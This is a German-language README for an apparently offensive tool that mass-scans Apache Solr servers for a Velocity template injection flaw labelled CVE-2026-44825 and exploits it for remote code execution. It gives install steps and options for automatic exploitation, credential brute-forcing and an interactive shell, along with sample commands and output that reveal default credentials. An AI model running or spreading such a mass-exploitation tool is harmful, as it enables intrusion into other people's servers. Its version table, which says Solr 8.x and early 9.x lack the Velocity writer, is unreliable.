
☄️ Massenaufklärungs- und Exploitation-Framework für Apache Solr CVE-2026-44825 — Velocity Template Injection zu RCE
CVE-2026-44825 ist eine kritische Schwachstelle in Apache Solr, die es Angreifern ermöglicht, durch Velocity-Template-Injection eine unauthentifizierte Remotecodeausführung (RCE) zu erreichen.
Der /select-Endpunkt von Apache Solr akzeptiert einen Parameter wt=velocity, der benutzergesteuerte Velocity-Templates rendert. Wenn der Velocity-Response-Writer aktiviert ist (oder über die Konfigurations-API aktiviert werden kann), kann ein Angreifer ein bösartiges Template injizieren, das java.lang.Runtime.exec() aufruft und damit beliebige Systembefehle mit den Berechtigungen des Solr-Prozesses ausführt.
| Vektor | Schweregrad | Auswirkung |
|---|---|---|
| Unauthentifizierte RCE | 9.8 (Kritisch) | Vollständige Systemkompromittierung |
| Authentifizierte RCE | 8.8 (Hoch) | Codeausführung nach Authentifizierung |
| Informationsoffenlegung | 5.3 (Mittel) | Aufzählung von Cores/Collections |
Apache Solr bündelt Apache Velocity als optionale Template-Engine für die Antwortdarstellung. Die Schwachstelle liegt im VelocityResponseWriter von Solr, der benutzergesteuerte Template-Parameter ohne ausreichende Bereinigung verarbeitet und so den direkten Aufruf von Java-Reflection-APIs ermöglicht:
Java-Reflection-Kette:
vtl → Class.forName("java.lang.Runtime") → getRuntime().exec(cmd)
| Apache Solr Version | Status | Hinweise |
|---|---|---|
| 9.4.0 – 9.10.1 | 🔴 Verwundbar | Aktive Ausnutzung in freier Wildbahn |
| 10.0.0 | 🔴 Verwundbar | Erste 10.x-Version betroffen |
| 10.0.1+ | 🟢 Gepatcht | Fix zurückportiert |
| 9.10.2+ | 🟢 Gepatcht | Patch-Version verfügbar |
| ≤ 9.3.x | 🟢 Nicht betroffen | Velocity-Response-Writer nicht vorhanden |
| 8.x (alle) | 🟢 Nicht betroffen | Kein Velocity-Support |
Hinweis: Die Versionsprüfung erfolgt automatisch durch das Parsen der JSON-Antwort von
/admin/info/system.
🔍 Aufklärung
|
💀 Ausnutzung
|
# Repository klonen
git clone https://github.com/shinthink/solrradar.git
cd solrradar
# Abhängigkeiten installieren
pip install -r requirements.txt
# Überprüfen
python solr_scanner.py --help
requests>=2.28.0
urllib3>=1.26.0
Nur Standardbibliotheken +
requests. Keine exotischen Abhängigkeiten.
CVE-2026-44825 Apache Solr Scanner
-t, --target Einzelne Ziel-URL oder IP[:Port]
-f, --file Datei mit Zielen (eines pro Zeile, # für Kommentare)
--exploit Automatische Ausnutzung, wenn verwundbare Anmeldedaten gefunden werden
--rce Interaktive Shell nach der Authentifizierung starten
-u, --user Benutzername für Basic Auth
-pw, --password Passwort für Basic Auth
-o, --output JSON-Ausgabedateipfad (Standard: solr_results.json)
-w, --workers Anzahl gleichzeitiger Threads (Standard: 30)
-T, --timeout HTTP-Request-Timeout (Sekunden) (Standard: 8)
# Einzelnes Ziel
python solr_scanner.py -t 192.168.1.100:8983
# Einzelnes Ziel mit benutzerdefiniertem Pfad
python solr_scanner.py -t http://example.com/solr
# Massenscan aus Datei
python solr_scanner.py -f targets.txt -o results.json
# targets.txt — unterstützt Kommentare und Leerzeilen
192.168.10.10:8983
192.168.10.20:8983
http://solr-target.internal/solr
192.168.1.0/24 # (CIDR nicht unterstützt; vorher mit externem Tool erweitern)
# Scannen + automatische Ausnutzung, wenn Anmeldedaten gefunden
python solr_scanner.py -f targets.txt --exploit
# Bekannte Anmeldedaten + interaktive Shell
python solr_scanner.py -t target:8983 --rce -u admin -pw SolrRocks
# Automatisches Brute-Force + Shell bei Erfolg
python solr_scanner.py -t target:8983 --rce
$ python solr_scanner.py -f targets.txt
CVE-2026-44825 Apache Solr Scanner
Targets: 3 | Threads: 30 | Timeout: 8s
Scanning...
[Solr 8.11.2] http://192.168.10.10:8983/solr
[Solr 8.11.2] http://192.168.10.20:8983/solr
Cols (no auth): ['authority', 'dfa', 'oai', 'search']
[Solr 9.4.1] VULN +Auth http://solr-target.internal/solr
Done. Total:3 | Solr:3 | Vuln:1
Alle 3 Ziele erkannt. Die 9.4.1-Instanz wird als verwundbar mit aktiviertem Basic Auth gekennzeichnet.
$ python solr_scanner.py -t solr-target.internal
CVE-2026-44825 Apache Solr Scanner
[Solr 9.4.1] VULN +Auth http://solr-target.internal/solr
[!] admin:SolrRocks
Cols: ['cms', 'users', 'search', 'analytics']